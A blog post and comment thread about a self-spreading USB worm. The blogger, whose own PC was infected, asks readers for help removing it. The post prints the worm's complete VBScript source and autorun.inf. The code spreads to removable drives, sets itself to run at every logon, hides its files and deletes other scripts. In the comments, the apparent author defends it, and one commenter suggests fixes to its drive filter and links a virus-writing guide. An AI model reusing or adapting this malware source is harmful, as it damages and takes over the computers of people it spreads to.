But yesterday, I came across this damn thing which does awful things like changing the folder settings. I have set folder settings to show the hidden files, but in few seconds it was changed into do not show hidden files and folders.
soooo, after all, my computer too was infected. It was a quick virus/worm I say. I was trying to format a USB drive and suddenly,it was there!!
Here is the script if any one is interested.
This is the auto run file
[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=
Note: Now you cannot be assured that formatting an affected USB drive is a safe way to get rid of viruses etc. For example, this virus gets into the computer in 5 methods as the above code suggests
1.Opening
2. Using Autoplay feature
3. Exploring(right click and select explore)
4.Searching for the files saved in the USB drive
5. formatting
Interesting!!
The actual virus script which can be found in c:windows\system32\semiantivirus.vbs
To tell the truth, i do not understand a single line of this coding(except the italicized part which has a good sense of humor) but hope it would help the computer geeks in finding a solution
Important: please do not use this information for unethical purposes
'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them and its specially for LRI School only.
'I am not responsible if it goes to other place.
'If you do not belong to LRI Family then, please .......
'Author : Rajkumar Ghale (edited of VirusRemoval.vbs) of Sujin
'About me: I got a lots of program.
' If u want them, then u can contact me.
'Original Copy : Boot.vbs
'Virus Name : isetup.exe or Kinja.exe
'Another Copy : Sys.vbs
'Other Copy by Sujin : VirusRemoval.vbs
'******************************************************************
'******************************************************************
Option Explicit
On Error Resume Next
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
appfolder=Shells.SpecialFolders("AppData")
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
crvbs SystemDir,"SemiAntiVirus.vbs"
Shells.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"
Count=Drv.DriveType
Do
delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
Next
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
Shells.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","LRI Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\SemiAntiVirus.vbs"
For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"
delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"SemiAntiVirus.vbs"
End if
delt Drives.Path,"sxs.exe",false
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"
End If
End If
End if
End If
Next
if Count <> 1 then
Wscript.sleep 2000
end if
loop while Count<>1
sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "SemiAntiVirus.vbs" Then set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
else
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub
sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
Loop
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"SemiAntiVirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1
end if
else
set Writ = fSys.CreateTextFile(fPath & "\SemiAntiVirus.vbs",true,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub
sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
Loop
ReadAl.close
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Writ.close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
else
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Writ.Close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
End sub
i am still tring to find a way to remove this. the vbs file cannot be deleted as it says that it is being used by another program.
mm and the best part is it doesnot allow another AVG to be installed in the machine. i tried to install Avast, but the moment the setup.exe loads, the machine restarts.
cooool, keep in touch, i'll post how to remove it if i find a way.
untill then, have fun!!
PS:: if you know any way to remove this, please you are more than welcome
yuho!! there are many things coming in. the IE title bar is changed into LRI internet explorer.(if you lok at the virus script carefull you can see more)..hehee feel like, im learning how to read a virus script
ReplyDeleteThanks for putting the code in your blog coz I'm pretty much interested in such coding stuff. Now I'm checking it.
ReplyDeleteyou are welcome brother!! have a look, yh, it is pretty interesting!
ReplyDeleteThanks for the information!
ReplyDeleteI never had the idea of the Format thing. It looks like Windows Explorer is very very unsafe.
Use the command prompt (cmd.exe) to format disks, rather than using the Windows Explorer. It' the safe option.
Eg:
format e: /fs:fat32 /v deeps_usb /x
For more info:
format /?
---
I read your script. It looks like it has some basic antivirus capability, but it itself acts as a virus. Looks like this baby doesn't like to coexist with other viruses.
Open a command prompt and enter the following lines one after one. (You can copy-paste)
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "" /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.google.lk/" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %%SYSTEMROOT%%\System32\userinit.exe, /f
For more information, try:
reg
reg add /?
@ shaakunthala(with regard to the following commands)
ReplyDeletereg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "" /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.google.lk/" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %%SYSTEMROOT%%\System32\userinit.exe, /f
I have already changed the home page manually in IE settings and tried to change the title bar using command prmpt. But changing the title bar of the IE is not possible, it says that the system cannot find the path specified.
So i tried to use registry editor to edit it. to my dismay, there was no entry called HKCU\Software\Microsoft\Internet Explorer\Main\Window Title
under main, there are only 3 entries. Namely
ErrorThresholds
FeatureControl
and
UrlTemplate
check the virus code.
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
i think this has something to do with it
windows is not at all safe it seems!!
(with regard to deleting the virus files)
there are no files in my machine now. i have deleted them all. after deleting only I got this annoying pop up at the start up
i have made a mistake in registry editor..hehehe now all the things are working properly..thanks for the help
ReplyDeleteHi deep, its me Rajkumar...
ReplyDeleteActually its not the virus,, it's like an antivirus.. and doesn't let the usb virus to attack the computer...
U can use it in more secure way than any other antivirus..
Rajkumar
@Anonymous (Rajkumar),
ReplyDeleteAnything that runs and spreads without your proper permission is potentially a virus.
oh.. sorry for that...
ReplyDeletebut as i told... i had made it for my personal use....
i don't know how it transfered...
Neither i have kept it in net..
I m from nepal and i don't know how did it transfer to srilanka...
but sory for that...
No buddy, no need to say sorry. :)
ReplyDeleteThere are some auto replicating scripts that show up as anti-virus programs. Most of the time these scripts are adware. They do minor changes in your system such as changing your Internet Explorer home page and likewise.
@Anonymous
ReplyDeletehey, no need to say sorry. when i was writing the post, i did some research with the data provided in the disclaimer part of the script. it led me to this school as the place of origin of the virus.
http://www.glocalnepal.com/lrischool
so, i already knew that its from Nepal ;-P
well, the browser name still changes to LRI if you run this on a machine. It means to me that the original script itself has come to
sri lanka
Australia
India
Saudi Arabia
Sao Paulo
USA
Singapore
Hefa etc etc according to my web analyzer's data.
and yes, agree with you ශාකුන්තල Anything that runs and spreads without your proper permission is potentially a virus and that is why people from all over the world Google to find a way to remove it.
you may have created it for your personal use but however, it is leaked and now affecting lot of computers in many countries.
ok, use a custom kernel compiled by your self..which disabled the USB ports...or adding extra protections for /dev/sdb*....
ReplyDelete@Rajkumar -- your virus script is a stupid idea.
ReplyDeleteI got a version of it. I thjink it's all over the world.
http://thedailyreviewer.com/xphelp/view/wscriptexe---no-disk-error-1012097403
Don't screw up other people's computers!
Well, he's just a kid.
ReplyDeleteTaking into account where he lives and his age, he's brilliant.
I can feel the way he thinks, as I have also passed that age.
Giving him some helping hand with some sociological aspects, law and ethics as well would eventually build an ethical hacker. :-)
agree with shaakunthala on the comment of david
ReplyDelete@David Zetland : You told that its every where... look in you link..
ReplyDeletehttp://thedailyreviewer.com/xphelp/view/wscriptexe---no-disk-error-1012097403
Look in the function
sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
Raj is my name... and i have declared it as my variable...
He is a cheater and copied my code...
haha
Rajkumar
@Rajkumar
ReplyDeleteThat wscript.exe 'no disk' error is caused because may be you didnot keep a check for filtering and preventing 'A:' (Floppy infection) or the filter code in your script is not working. It happened to me too once in my script and it turned out to be the Script trying to find and infect Floppy Device which ofcourse is never ready these days.
Make sure you add the Floppy Filter properly.
____________________________________
Here is a virus guide. It spreads from Pendrives and open Network drives.
http://mywindowsworld.blogspot.com/2011/10/this-is-basic-framework-of-vbs-autorun.html
____________________________________
Well, most of the people think there are no hackers in Nepal. Well I'd like to proudly state that they are wrong. I'm one of the Nepalese Hackers and so is this Script Writer.
Visit this:
ReplyDeletehttp://mywindowsworld.blogspot.com/2011/10/this-is-basic-framework-of-vbs-autorun.html
@anonymos: well that's not my problem.. i don't think, nowadays floppy will be used... i don't use them, so i havn't used filter for Floppy... but its easy... need to add 2-3 lines..
ReplyDeleteAnd also abt nepali hackers nd script writer, i don't think they r lyk other hackers.... m too nepali and make script, software... they jus lyk to copy it without reference nd i don't lyk it... for exmple.. this was my own creation... i have seen many of them copying it.. editing it... but no reference.. jus some of my variable have not been edited yet nd that's the proof...
This post is invaluable. Where can I find out more?
ReplyDeletemy weblog - Pur Essence Skin Care